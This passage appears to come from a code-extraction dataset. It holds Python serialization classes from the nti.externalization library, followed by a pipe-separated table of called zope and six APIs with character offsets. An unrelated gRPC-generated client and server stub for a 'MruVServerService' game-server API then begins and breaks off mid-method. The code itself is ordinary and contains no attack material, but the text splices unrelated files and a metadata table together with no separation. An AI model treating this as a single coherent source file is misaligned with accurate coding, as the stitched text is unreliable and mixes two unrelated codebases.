        `_ext_keys`, recursively externalizing values not listed in
        `_ext_primitive_keys` and parenting newly created sub-objects.
        """
        result = super(AbstractDynamicObjectIO, self).toExternalDictionary(mergeFrom=mergeFrom,
                                                                           **kwargs)
        ext_self = self._ext_replacement()
        primitive_ext_keys = self._ext_primitive_keys()
        for k in self._ext_keys():
            if k in result:
                # Standard key already added
                continue
            ext_val = attr_val = self._ext_getattr(ext_self, k)
            __traceback_info__ = k, attr_val
            if k not in primitive_ext_keys:
                ext_val = _toExternalObject(attr_val, **kwargs)
            result[k] = ext_val
            if ext_val is not attr_val:
                # We want to be sure things we externalize have the
                # right parent relationship but if we are directly
                # externalizing an existing object (e.g., primitive or
                # something that uses a replacement) we don't want to
                # change the relationship or even set one in the first
                # place---if the object gets pickled later on, that
                # could really screw things up (One symptom is
                # InvalidObjectReference from ZODB across
                # transactions/tests) if ILocation.providedBy(
                # result[k] ): (throwing is faster than providedBy)
                try:
                    ext_val.__parent__ = ext_self
                except AttributeError:
                    # toExternalObject is schizophrenic about when it converts
                    # return values to LocatedExternalDict/List. Sometimes it
                    # does, sometimes it does not.
                    pass
        if (StandardExternalFields.ID in result
                and StandardExternalFields.OID in result
                and self._prefer_oid_
                and result[StandardExternalFields.ID] != result[StandardExternalFields.OID]):
            result[StandardExternalFields.ID] = result[StandardExternalFields.OID]
        return result
    def toExternalObject(self, mergeFrom=None, *args, **kwargs):
        """See `toExternalDictionary`."""
        return self.toExternalDictionary(mergeFrom, *args, **kwargs)
    def _ext_accept_update_key(self, k, ext_self, ext_keys): # pylint:disable=unused-argument
        """
        Returns whether or not this key should be accepted for setting
        on the object, or silently ignored.
        :param ext_keys: As an optimization, the value of :meth:`_ext_all_possible_keys`
            is passed. Keys are only accepted if they are in this list.
        """
        return k not in self._excluded_in_ivars_ and k in ext_keys
    def _ext_accept_external_id(self, ext_self, parsed): # pylint:disable=unused-argument
        """
        If the object we're updating does not have an ``id`` set, but there is an
        ``ID`` in the external object, should we be able to use it?
        :return: boolean
        """
        return False # false by default
    def updateFromExternalObject(self, parsed, *unused_args, **unused_kwargs):
        """Update `_ext_replacement` from the *parsed* dictionary."""
        return self._updateFromExternalObject(parsed)
    def _updateFromExternalObject(self, parsed):
        """
        Copy each accepted key/value from *parsed* onto the object via
        `_ext_setattr`, then backfill the standard container/creator/id
        fields when they exist on the object but are currently `None`.
        :return: True if at least one attribute was set.
        """
        updated = False
        ext_self = self._ext_replacement()
        ext_keys = self._ext_all_possible_keys()
        for k, v in iteritems(parsed):
            if not self._ext_accept_update_key(k, ext_self, ext_keys):
                continue
            __traceback_info__ = (k, v)
            self._ext_setattr(ext_self, k, v)
            updated = True
        # TODO: Should these go through _ext_setattr?
        # In the getattr calls below, *parsed* doubles as the default
        # sentinel: a *missing* attribute is not None, so only attributes
        # that exist with the value None get backfilled.
        if (StandardExternalFields.CONTAINER_ID in parsed
                and getattr(ext_self, StandardInternalFields.CONTAINER_ID, parsed) is None):
            setattr(ext_self,
                    StandardInternalFields.CONTAINER_ID,
                    parsed[StandardExternalFields.CONTAINER_ID])
        if (StandardExternalFields.CREATOR in parsed
                and getattr(ext_self, StandardInternalFields.CREATOR, parsed) is None):
            setattr(ext_self,
                    StandardInternalFields.CREATOR,
                    parsed[StandardExternalFields.CREATOR])
        if (StandardExternalFields.ID in parsed
                and getattr(ext_self, StandardInternalFields.ID, parsed) is None
                and self._ext_accept_external_id(ext_self, parsed)):
            setattr(ext_self,
                    StandardInternalFields.ID,
                    parsed[StandardExternalFields.ID])
        return updated
interface.classImplements(AbstractDynamicObjectIO, IInternalObjectIOFinder)
class _ExternalizableInstanceDict(AbstractDynamicObjectIO):
    """
    Private `AbstractDynamicObjectIO` implementation that externalizes
    the ``__dict__`` of an arbitrary *context* object. Used as the
    per-call delegate of `ExternalizableInstanceDict`.
    """
    # TODO: there should be some better way to customize this if desired (an explicit list)
    # TODO: Play well with __slots__? ZODB supports slots, but doesn't recommend them
    # TODO: This won't evolve well. Need something more sophisticated,
    # probably a meta class.
    #: When true, updates also accept keys naming attributes reachable
    #: via ``hasattr`` (e.g., class-level attributes), not just
    #: already-externalizable instance keys.
    _update_accepts_type_attrs = False
    def __init__(self, context):
        """
        Adapt *context*, copying over any of the customization knobs
        it defines so they take effect on this adapter.
        """
        self.context = context
        for name in (
                '_update_accepts_type_attrs',
                '__external_use_minimal_base__',
                '_excluded_in_ivars_',
                '_excluded_out_ivars_',
                '_ext_primitive_out_ivars_',
                '_prefer_oid_'
        ):
            try:
                v = getattr(context, name)
            except AttributeError:
                continue
            else:
                setattr(self, name, v)
    def _ext_replacement(self):
        """Externalize the adapted *context*."""
        return self.context
    def _ext_all_possible_keys(self):
        # Be sure that this returns native strings, even if the dict
        # has unicode (Python 2) or bytes (Python 3) values.
        # Because we are likely to turn around and pass the strings
        # we return here to _ext_getattr(), the best solution is to actually
        # fix the dict if we find any broken attributes; Python 3 would fail
        # if we encode a bytes value in the dict and then ask for it by string.
        ext_self = self._ext_replacement()
        ext_dict = ext_self.__dict__
        # Do our best to avoid copying in the common case that no
        # fixup is needed
        for key in ext_dict:
            if not isinstance(key, str):
                # fixup
                if hasattr(ext_self, '_p_changed'):
                    # Tell persistence (ZODB) we mutated __dict__ in place.
                    ext_self._p_changed = 1
                for k in list(ext_dict):
                    if not isinstance(k, str):
                        new_k = k.encode('ascii') if not isinstance(k, bytes) else k.decode('ascii')
                        val = ext_dict.pop(k)
                        ext_dict[new_k] = val
                break
        return frozenset(ext_dict)
    def _ext_getattr(self, ext_self, k, default=NotGiven):
        # Plain attribute access; *default* suppresses AttributeError.
        if default is NotGiven:
            return getattr(ext_self, k)
        return getattr(ext_self, k, default)
    def _ext_setattr(self, ext_self, k, value):
        # Plain, unvalidated attribute assignment.
        setattr(ext_self, k, value)
    def _ext_accept_update_key(self, k, ext_self, ext_keys):
        # Besides the normal rule, optionally accept keys naming
        # existing attributes when _update_accepts_type_attrs is set.
        return (
            super(_ExternalizableInstanceDict, self)._ext_accept_update_key(k, ext_self, ext_keys)
            or (self._update_accepts_type_attrs and hasattr(ext_self, k))
        )
class ExternalizableInstanceDict(object):
    """
    Externalizes to a dictionary containing the members of
    ``__dict__`` that do not start with an underscore.
    Meant to be used as a super class; also can be used as an external
    object superclass.
    Consider carefully before using this class. Generally, an interface
    and `InterfaceObjectIO` are better.
    .. versionchanged:: 1.0a5
       No longer extends `AbstractDynamicObjectIO`, just delegates to it.
       Most of the ``_ext_`` prefixed methods can no longer be overridden.
    """
    # Subclasses sometimes also extend persistent.Persistent, which cannot
    # share a layout with an extension (Cython) class such as
    # AbstractDynamicObjectIO -- hence delegation instead of inheritance.
    # The class is rarely used, so the indirection cost is acceptable.
    # pylint:disable=protected-access
    # Mirror the delegate's tuning knobs so subclasses can override them
    # here; _ExternalizableInstanceDict.__init__ copies them back over.
    _update_accepts_type_attrs = _ExternalizableInstanceDict._update_accepts_type_attrs
    __external_use_minimal_base__ = _ExternalizableInstanceDict.__external_use_minimal_base__
    _excluded_out_ivars_ = AbstractDynamicObjectIO._excluded_out_ivars_
    _excluded_in_ivars_ = AbstractDynamicObjectIO._excluded_in_ivars_
    _ext_primitive_out_ivars_ = AbstractDynamicObjectIO._ext_primitive_out_ivars_
    _prefer_oid_ = AbstractDynamicObjectIO._prefer_oid_
    def _ext_replacement(self):
        "See `ExternalizableDictionaryMixin._ext_replacement`."
        return self
    def _make_io(self):
        # A fresh delegate per call; it snapshots our tuning knobs.
        return _ExternalizableInstanceDict(self._ext_replacement())
    def __getattr__(self, name):
        # Normal lookup failed; see whether the delegate IO provides it.
        return getattr(self._make_io(), name)
    def updateFromExternalObject(self, parsed, *unused_args, **unused_kwargs):
        "See `~.IInternalObjectIO.updateFromExternalObject`"
        self._make_io().updateFromExternalObject(parsed)
    def toExternalObject(self, mergeFrom=None, *args, **kwargs):
        "See `~.IInternalObjectIO.toExternalObject`. Calls `toExternalDictionary`."
        return self.toExternalDictionary(mergeFrom, *args, **kwargs)
    def toExternalDictionary(self, mergeFrom=None, *unused_args, **kwargs):
        "See `ExternalizableDictionaryMixin.toExternalDictionary`"
        return self._make_io().toExternalDictionary(mergeFrom, **kwargs)
    __repr__ = make_repr()
# ExternalizableInstanceDict supplies the full IO contract by delegation.
interface.classImplements(ExternalizableInstanceDict, IInternalObjectIO)
# Types treated as primitive when deciding whether a schema field's value
# can skip recursive externalization (see _ext_find_primitive_keys).
_primitives = six.string_types + (numbers.Number, bool)
class _AnonymousDictFactory(AnonymousObjectFactory):
    """
    Factory installed by `InterfaceObjectIO.find_factory_for_named_value`
    for ``Dict`` schema fields with object values: it hands the parsed
    external dictionary back unchanged so it is updated in place.
    """
    #: Presumably signals that the factory should receive the external
    #: value as an argument (ordinary anonymous factories take none) --
    #: see AnonymousObjectFactory for the contract.
    __external_factory_wants_arg__ = True
    @staticmethod
    def default_factory(value):
        # Identity: the parsed value itself is the "created" object.
        return value
class InterfaceObjectIO(AbstractDynamicObjectIO):
    """
    Externalizes the *context* to a dictionary based on getting the
    attributes of an object defined by an interface. If any attribute
    has a true value for the tagged value ``_ext_excluded_out``, it
    will not be considered for reading or writing.
    This is an implementation of
    `~nti.externalization.interfaces.IInternalObjectIOFinder`, meaning
    it can both internalize (update existing objects) and externalize
    (producing dictionaries), and that it gets to choose the factories
    used for sub-objects when internalizing.
    This class is meant to be used as an adapter, so it accepts the
    object to externalize in the constructor, as well as the interface
    to use to guide the process. The object is externalized using the
    most-derived version of the interface given to the constructor
    that it implements.
    If the interface (or an ancestor) has a tagged value
    ``__external_class_name__``, it can either be the value to use for
    the ``Class`` key, or a callable
    ``__external_class_name__(interface, object ) -> name.``
    (TODO: In the future extend this to multiple, non-overlapping
    interfaces, and better interface detection (see
    :class:`ModuleScopedInterfaceObjectIO` for a limited version of
    this.)
    This class overrides `_ext_replacement` to return the *context*.
    """
    #: Default upper bound on the schema search; subclasses may set this
    #: instead of overriding the constructor.
    _ext_iface_upper_bound = None
    def __init__(self, context, iface_upper_bound=None, validate_after_update=True):
        """
        :param iface_upper_bound: The upper bound on the schema to use
            to externalize `ext_self`; we will use the most derived sub-interface
            of this interface that the object implements. Subclasses can either override this
            constructor to pass this parameter (while taking one argument themselves,
            to be usable as an adapter), or they can define the class
            attribute ``_ext_iface_upper_bound``
        :param bool validate_after_update: If ``True`` (the default) then the entire
            schema will be validated after an object has been updated with
            :meth:`update_from_external_object`, not just the keys that were assigned.
        """
        AbstractDynamicObjectIO.__init__(self)
        self._ext_self = context
        # Cache all of this data that we use. It's required often and, if not quite a bottleneck,
        # does show up in the profiling data
        cache = cache_for(self, context)
        if cache.iface is None:
            cache.iface = self._ext_find_schema(
                context,
                iface_upper_bound if iface_upper_bound is not None else self._ext_iface_upper_bound
            )
        self._iface = cache.iface
        if not cache.ext_primitive_out_ivars:
            keys = self._ext_find_primitive_keys()
            primitives = self._ext_primitive_out_ivars_
            if not isinstance(primitives, frozenset):
                # BUG FIX: the message parts previously ran together with
                # no separating spaces (adjacent-literal concatenation).
                warnings.warn(
                    "Class %r should have a frozenset for _ext_primitive_out_ivars_. "
                    "Make InterfaceObjectIO._ext_primitive_out_ivars_ the LHS of the | operator. "
                    "This will be a TypeError in the future" % (
                        type(self)
                    ),
                    FutureWarning,
                )
                primitives = frozenset(primitives)
            cache.ext_primitive_out_ivars = primitives | keys
        self._ext_primitive_out_ivars_ = cache.ext_primitive_out_ivars
        self.validate_after_update = validate_after_update
    def __repr__(self):
        return '<%s.%s for %r at 0x%x>' % (
            type(self).__module__, type(self).__name__,
            self.schema,
            id(self)
        )
    @property
    def schema(self):
        """
        The schema we will use to guide the process
        """
        return self._iface
    def _ext_find_schema(self, ext_self, iface_upper_bound):
        """
        Return the most derived interface provided by *ext_self* that
        descends from *iface_upper_bound*.
        """
        return find_most_derived_interface(ext_self,
                                           iface_upper_bound,
                                           possibilities=self._ext_schemas_to_consider(ext_self))
    def _ext_find_primitive_keys(self):
        """
        Names of schema fields whose declared ``_type`` is primitive
        (string/number/bool), so externalization can skip recursing
        into their values.
        """
        result = set()
        for n in self._ext_all_possible_keys():
            field = self._iface[n]
            field_type = getattr(field, '_type', None)
            if field_type is not None:
                if isinstance(field_type, tuple):
                    # Cython doesn't like a generator here
                    # ("local variable 'field_type' referenced before assignment")
                    # pylint:disable=use-a-generator
                    if all([issubclass(x, _primitives) for x in field_type]):
                        result.add(n)
                elif issubclass(field_type, _primitives):
                    result.add(n)
        return frozenset(result)
    def _ext_schemas_to_consider(self, ext_self):
        """All interfaces provided by *ext_self*."""
        return interface.providedBy(ext_self)
    def _ext_replacement(self):
        """Externalize the adapted *context* object."""
        return self._ext_self
    def _ext_all_possible_keys(self):
        """
        All non-method names in the schema that are not tagged with a
        true ``_ext_excluded_out`` value; cached.
        """
        cache = cache_for(self, self._ext_self)
        if cache.ext_all_possible_keys is None:
            iface = self._iface
            is_method = interface.interfaces.IMethod.providedBy
            cache.ext_all_possible_keys = frozenset([
                n for n in iface.names(all=True)
                if (not is_method(iface[n]) # pylint:disable=no-value-for-parameter
                    and not iface[n].queryTaggedValue('_ext_excluded_out', False))
            ])
        return cache.ext_all_possible_keys
    def _ext_getattr(self, ext_self, k, default=NotGiven):
        # TODO: Should this be directed through IField.get?
        if default is NotGiven:
            return getattr(ext_self, k)
        return getattr(ext_self, k, default)
    def _ext_setattr(self, ext_self, k, value):
        # Validate *value* against the schema field, then invoke the
        # assignment callable the validator returns.
        validate_named_field_value(ext_self, self._iface, k, value)()
    def _ext_accept_external_id(self, ext_self, parsed):
        """
        If the interface we're working from has a tagged value
        of ``__external_accept_id__`` on the ``id`` field, then
        this will return that value; otherwise, returns false.
        """
        cache = cache_for(self, ext_self)
        if cache.ext_accept_external_id is None:
            try:
                field = cache.iface['id']
                cache.ext_accept_external_id = field.getTaggedValue('__external_accept_id__')
            except KeyError:
                cache.ext_accept_external_id = False
        return cache.ext_accept_external_id
    def find_factory_for_named_value(self, key, value):
        """
        If `AbstractDynamicObjectIO.find_factory_for_named_value`
        cannot find a factory based on examining *value*, then we use
        the context objects's schema to find a factory.
        If the schema contains an attribute named *key*, it will be
        queried for the tagged value ``__external_factory__``. If
        present, this tagged value should be the name of a factory
        object implementing `.IAnonymousObjectFactory` registered in
        *registry* (typically registered in the global site).
        The ZCML directive `.IAnonymousObjectFactoryDirective` sets up both the
        registration and the tagged value.
        This is useful for internalizing data from external sources
        that does not provide a class or MIME field within the data.
        The most obvious limitation of this is that if the *value* is part
        of a sequence, it must be a homogeneous sequence. The factory is
        called with no arguments, so the only way to deal with heterogeneous
        sequences is to subclass this object and override this method to
        examine the value itself.
        A second limitation is that the external data key must match
        the internal schema field name. Again, the only way to
        remove this limitation is to subclass this object.
        If no registered factory is found, and the schema field is
        a `zope.schema.Dict` with a value type of `zope.schema.Object`,
        then we return a factory which will update the object in place.
        .. versionchanged:: 1.0a6
           Only return an anonymous factory for ``IDict`` fields when
           it wants objects for the value.
        """
        factory = AbstractDynamicObjectIO.find_factory_for_named_value(self, key, value)
        if factory is None: # pylint:disable=too-many-nested-blocks
            # Is there a factory on the field?
            # TODO: Simplify this.
            try:
                field = self._iface[key]
                # See zcml.py:anonymousObjectFactoryDirective.
                # This *should* be a string giving the dottedname of a factory utility.
                # For test purposes we also allow it to be an actual object.
                # TODO: If this becomes a bottleneck, the ZCML could
                # have an argument global=False to allow setting the type
                # directly instead of a string; the user would have to
                # *know* that no sites would ever need a different value.
            except KeyError:
                pass
            else:
                factory = field.queryTaggedValue('__external_factory__')
                # When it is a string, we require the factory to exist.
                # Anything else is a programming error.
                if isinstance(factory, str):
                    factory = getUtility(IAnonymousObjectFactory, factory)
                if (
                        factory is None
                        and IDict_providedBy(field) # pylint:disable=no-value-for-parameter
                        and isinstance(value, dict)
                        and IObject_providedBy(field.value_type) # pylint:disable=no-value-for-parameter
                ):
                    # If is no factory found, check to see if the
                    # schema field is a Dict with a complex value type, and if
                    # so, automatically update it in place. The alternative
                    # requires the user to use a ZCML directive for each such
                    # dict field.
                    value_schema = field.value_type.schema
                    default_impl = value_schema.queryTaggedValue(
                        '__external_default_implementation__'
                    )
                    if default_impl is not None:
                        # Add MimeType if it's missing, so we can find the correct factories and
                        # updaters.
                        mime_type = default_impl.mimeType
                        for nested_value in value.values():
                            if (StandardExternalFields.MIMETYPE not in nested_value
                                    and StandardExternalFields.CLASS not in nested_value):
                                nested_value[StandardExternalFields.MIMETYPE] = mime_type
                    # Cache the in-place factory on the field for next time.
                    factory = _AnonymousDictFactory(title=key,
                                                    interfaces=(value_schema,))
                    field.setTaggedValue('__external_factory__', factory)
        return factory
    def updateFromExternalObject(self, parsed, *unused_args, **unused_kwargs):
        """
        Update the context from *parsed* via the superclass, then (by
        default) validate the whole schema against the updated object.
        """
        result = AbstractDynamicObjectIO._updateFromExternalObject(self, parsed)
        # If we make it this far, then validate the object.
        # TODO: Should probably just make sure that there are no /new/
        # validation errors added Best we can do right now is skip
        # this step if asked
        # TODO: Swizzle this method at runtime to be in this object's
        # dict, so we can elide the check.
        if self.validate_after_update:
            self._validate_after_update(self._iface, self._ext_self)
        return result
    def _validate_after_update(self, iface, ext_self):
        """
        Raise the first schema validation error found on *ext_self*,
        filling in the offending field name when the error has no args.
        """
        errors = schema.getValidationErrors(iface, ext_self)
        if errors:
            __traceback_info__ = errors
            try:
                raise errors[0][1]
            except SchemaNotProvided as e: # pragma: no cover
                # XXX: We shouldn't be able to get here;
                # ext_setattr should be doing this
                # This can probably be removed
                if not e.args: # zope.schema doesn't fill in the details, which sucks
                    e.args = (errors[0][0],)
                raise
    def toExternalObject(self, mergeFrom=None, **kwargs): # pylint:disable=arguments-differ
        """
        Externalize, honoring an ``__external_class_name__`` tagged
        value found on the schema (or an ancestor) as an override for
        the ``Class`` key.
        """
        ext_class_name = None
        # Walk up the tree, checking each one to see if ``__external__class_name__`` exists
        # and wants to provide a value. The walking up is what ``queryTaggedValue`` would do,
        # but we want to check each one in turn in case a subclass turns down but a superclass
        # accepts.
        for iface in self._iface.__iro__:
            ext_class_name = iface.queryDirectTaggedValue('__external_class_name__')
            if callable(ext_class_name):
                # Even though the tagged value may have come from a superclass,
                # give the actual class (interface) we're using
                ext_class_name = ext_class_name(self._iface,
                                                self._ext_replacement())
            if ext_class_name:
                break
        if ext_class_name:
            mergeFrom = mergeFrom if mergeFrom is not None else {}
            mergeFrom[StandardExternalFields.CLASS] = ext_class_name
        result = super(InterfaceObjectIO, self).toExternalObject(mergeFrom=mergeFrom, **kwargs)
        return result
class ModuleScopedInterfaceObjectIO(InterfaceObjectIO):
    """
    Only considers the interfaces provided within a given module
    (usually declared as a class attribute) when searching for the
    schema to use to externalize an object; the most derived version
    of interfaces within that module will be used. Subclasses must
    declare the class attribute ``_ext_search_module`` to be a module
    (something with the ``__name__``) attribute to locate interfaces
    in.
    Suitable for use when all the externalizable fields of interest
    are declared by an interface within a module, and an object does
    not implement two unrelated interfaces from the same module.
    .. note:: If the object does implement unrelated interfaces, but
        one (set) of them is a marker interface (featuring no schema
        fields or attributes), then it can be tagged with
        ``_ext_is_marker_interface`` and it will be excluded when
        determining the most derived interfaces. This can correct some
        cases that would otherwise raise a TypeError. This tag is not inherited.
    """
    #: Subclasses must set this to the module whose interfaces are to
    #: be considered (anything with a ``__name__`` attribute).
    _ext_search_module = None
    def _ext_find_schema(self, ext_self, iface_upper_bound):
        """
        Find the most derived considered interface, verifying that the
        candidates form a tree (raising `TypeError` otherwise).
        """
        # If the upper bound is given, then let the super class handle it all.
        # Presumably the user has given the correct branch to search.
        if iface_upper_bound is not None:
            return super(ModuleScopedInterfaceObjectIO, self)._ext_find_schema(
                ext_self, iface_upper_bound)
        most_derived = super(ModuleScopedInterfaceObjectIO, self)._ext_find_schema(
            ext_self, interface.Interface)
        # In theory, this is now the most derived interface.
        # If we have a graph that is not a tree, though, it may not be.
        # In that case, we are not suitable for use with this object.
        # TODO: This algorithm can and should be better in some cases, following the
        # C3 algorithm that __sro__ derivation itself uses.
        for iface in self._ext_schemas_to_consider(ext_self):
            if iface is most_derived:
                # Support interfaces that have their __module__ changed
                # dynamically (e.g., test_benchmarks)
                continue
            if not most_derived.isOrExtends(iface):
                raise TypeError(
                    "Most derived interface %s does not extend %s; non-tree interface structure. "
                    "Searching module %s and considered %s on object %s of class %s and type %s"
                    % (most_derived, iface, self._ext_search_module,
                       list(self._ext_schemas_to_consider(ext_self)),
                       ext_self, ext_self.__class__,
                       type(ext_self)))
        return most_derived
    def _ext_schemas_to_consider(self, ext_self):
        """
        Only interfaces declared in `_ext_search_module` that are not
        directly tagged ``_ext_is_marker_interface`` are candidates.
        """
        search_module_name = self._ext_search_module.__name__
        return [x for x in interface.providedBy(ext_self)
                if x.__module__ == search_module_name
                and not x.queryDirectTaggedValue('_ext_is_marker_interface')]
# pylint:disable=wrong-import-position,wrong-import-order
from nti.externalization._compat import import_c_accel
# Swap in the C-accelerated (Cython) implementation of this module when it
# is available; otherwise the pure-Python definitions above remain in use.
import_c_accel(globals(), 'nti.externalization._datastructures')
| [
"zope.interface.providedBy",
"zope.interface.classImplements",
"zope.component.getUtility",
"zope.schema.getValidationErrors",
"six.iteritems"
] | [((5448, 5542), 'zope.interface.classImplements', 'interface.classImplements', (['StandardInternalObjectExternalizer', 'IInternalObjectExternalizer'], {}), '(StandardInternalObjectExternalizer,\n IInternalObjectExternalizer)\n', (5473, 5542), False, 'from zope import interface\n'), ((14681, 14756), 'zope.interface.classImplements', 'interface.classImplements', (['AbstractDynamicObjectIO', 'IInternalObjectIOFinder'], {}), '(AbstractDynamicObjectIO, IInternalObjectIOFinder)\n', (14706, 14756), False, 'from zope import interface\n'), ((19795, 19867), 'zope.interface.classImplements', 'interface.classImplements', (['ExternalizableInstanceDict', 'IInternalObjectIO'], {}), '(ExternalizableInstanceDict, IInternalObjectIO)\n', (19820, 19867), False, 'from zope import interface\n'), ((13457, 13474), 'six.iteritems', 'iteritems', (['parsed'], {}), '(parsed)\n', (13466, 13474), False, 'from six import iteritems\n'), ((25100, 25130), 'zope.interface.providedBy', 'interface.providedBy', (['ext_self'], {}), '(ext_self)\n', (25120, 25130), False, 'from zope import interface\n'), ((32087, 32130), 'zope.schema.getValidationErrors', 'schema.getValidationErrors', (['iface', 'ext_self'], {}), '(iface, ext_self)\n', (32113, 32130), False, 'from zope import schema\n'), ((36765, 36795), 'zope.interface.providedBy', 'interface.providedBy', (['ext_self'], {}), '(ext_self)\n', (36785, 36795), False, 'from zope import interface\n'), ((29663, 29707), 'zope.component.getUtility', 'getUtility', (['IAnonymousObjectFactory', 'factory'], {}), '(IAnonymousObjectFactory, factory)\n', (29673, 29707), False, 'from zope.component import getUtility\n')] |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from server import server_model_pb2 as server_dot_server__model__pb2
from server import server_pb2 as server_dot_server__pb2
class MruVServerServiceStub(object):
    """The MruV server service provides procedures for managing game platform server actions.
    """

    # NOTE: gRPC-generated code (see file header) — do not hand-edit; change the
    # .proto definition and regenerate instead.

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # One client callable per RPC; (de)serializers come from the generated
        # *_pb2 modules so wire format always matches the .proto definition.
        self.RegisterServer = channel.unary_unary(
                '/mruv.server.MruVServerService/RegisterServer',
                request_serializer=server_dot_server__model__pb2.ServerInfo.SerializeToString,
                response_deserializer=server_dot_server__model__pb2.ServerID.FromString,
                )
        self.GetRegisteredServers = channel.unary_unary(
                '/mruv.server.MruVServerService/GetRegisteredServers',
                request_serializer=server_dot_server__pb2.GetRegisteredServersRequest.SerializeToString,
                response_deserializer=server_dot_server__pb2.GetRegisteredServersResponse.FromString,
                )
        self.GetServerInfo = channel.unary_unary(
                '/mruv.server.MruVServerService/GetServerInfo',
                request_serializer=server_dot_server__model__pb2.ServerID.SerializeToString,
                response_deserializer=server_dot_server__model__pb2.ServerInfo.FromString,
                )
        self.UpdateServerStatus = channel.unary_unary(
                '/mruv.server.MruVServerService/UpdateServerStatus',
                request_serializer=server_dot_server__pb2.UpdateServerStatusRequest.SerializeToString,
                response_deserializer=server_dot_server__pb2.UpdateServerStatusResponse.FromString,
                )
        # Server-streaming RPC: one request, a stream of ServerEvent responses.
        self.ServerEventsStream = channel.unary_stream(
                '/mruv.server.MruVServerService/ServerEventsStream',
                request_serializer=server_dot_server__pb2.ServerEventsStreamRequest.SerializeToString,
                response_deserializer=server_dot_server__pb2.ServerEvent.FromString,
                )
class MruVServerServiceServicer(object):
    """The MruV server service provides procedures for managing game platform server actions.
    """

    # NOTE: gRPC-generated base class — subclass and override the methods below
    # to implement the service; every default stub reports UNIMPLEMENTED.

    def RegisterServer(self, request, context):
        """Register instance of server for further managing.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetRegisteredServers(self, request, context):
        """Get all registered servers.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetServerInfo(self, request, context):
        """Get game server status.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def UpdateServerStatus(self, request, context):
        """Update game server status.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ServerEventsStream(self, request, context):
        """Stream of server events. Events are streamed back in real-time for chosen server.
        TODO: Change name to: SubscribeServerEvents
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_MruVServerServiceServicer_to_server(servicer, server):
    # gRPC-generated registration helper: wires a MruVServerServiceServicer
    # implementation into a grpc.Server under the service's full name.
    rpc_method_handlers = {
            'RegisterServer': grpc.unary_unary_rpc_method_handler(
                    servicer.RegisterServer,
                    request_deserializer=server_dot_server__model__pb2.ServerInfo.FromString,
                    response_serializer=server_dot_server__model__pb2.ServerID.SerializeToString,
            ),
            'GetRegisteredServers': grpc.unary_unary_rpc_method_handler(
                    servicer.GetRegisteredServers,
                    request_deserializer=server_dot_server__pb2.GetRegisteredServersRequest.FromString,
                    response_serializer=server_dot_server__pb2.GetRegisteredServersResponse.SerializeToString,
            ),
            'GetServerInfo': grpc.unary_unary_rpc_method_handler(
                    servicer.GetServerInfo,
                    request_deserializer=server_dot_server__model__pb2.ServerID.FromString,
                    response_serializer=server_dot_server__model__pb2.ServerInfo.SerializeToString,
            ),
            'UpdateServerStatus': grpc.unary_unary_rpc_method_handler(
                    servicer.UpdateServerStatus,
                    request_deserializer=server_dot_server__pb2.UpdateServerStatusRequest.FromString,
                    response_serializer=server_dot_server__pb2.UpdateServerStatusResponse.SerializeToString,
            ),
            # Streaming handler for the one server-streaming RPC.
            'ServerEventsStream': grpc.unary_stream_rpc_method_handler(
                    servicer.ServerEventsStream,
                    request_deserializer=server_dot_server__pb2.ServerEventsStreamRequest.FromString,
                    response_serializer=server_dot_server__pb2.ServerEvent.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'mruv.server.MruVServerService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
 # This class is part of an EXPERIMENTAL API.
class MruVServerService(object):
    """The MruV server service provides procedures for managing game platform server actions.
    """

    # NOTE: gRPC-generated convenience wrappers around grpc.experimental —
    # each static method opens an ad-hoc channel to `target` per call.

    @staticmethod
    def RegisterServer(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/mruv.server.MruVServerService/RegisterServer',
            server_dot_server__model__pb2.ServerInfo.SerializeToString,
            server_dot_server__model__pb2.ServerID.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def GetRegisteredServers(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/mruv.server.MruVServerService/GetRegisteredServers',
            server_dot_server__pb2.GetRegisteredServersRequest.SerializeToString,
            server_dot_server__pb2.GetRegisteredServersResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def GetServerInfo(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/mruv.server.MruVServerService/GetServerInfo',
            server_dot_server__model__pb2.ServerID.SerializeToString,
            server_dot_server__model__pb2.ServerInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def UpdateServerStatus(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/mruv.server.MruVServerService/UpdateServerStatus',
            server_dot_server__pb2.UpdateServerStatusRequest.SerializeToString,
            server_dot_server__pb2.UpdateServerStatusResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def ServerEventsStream(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
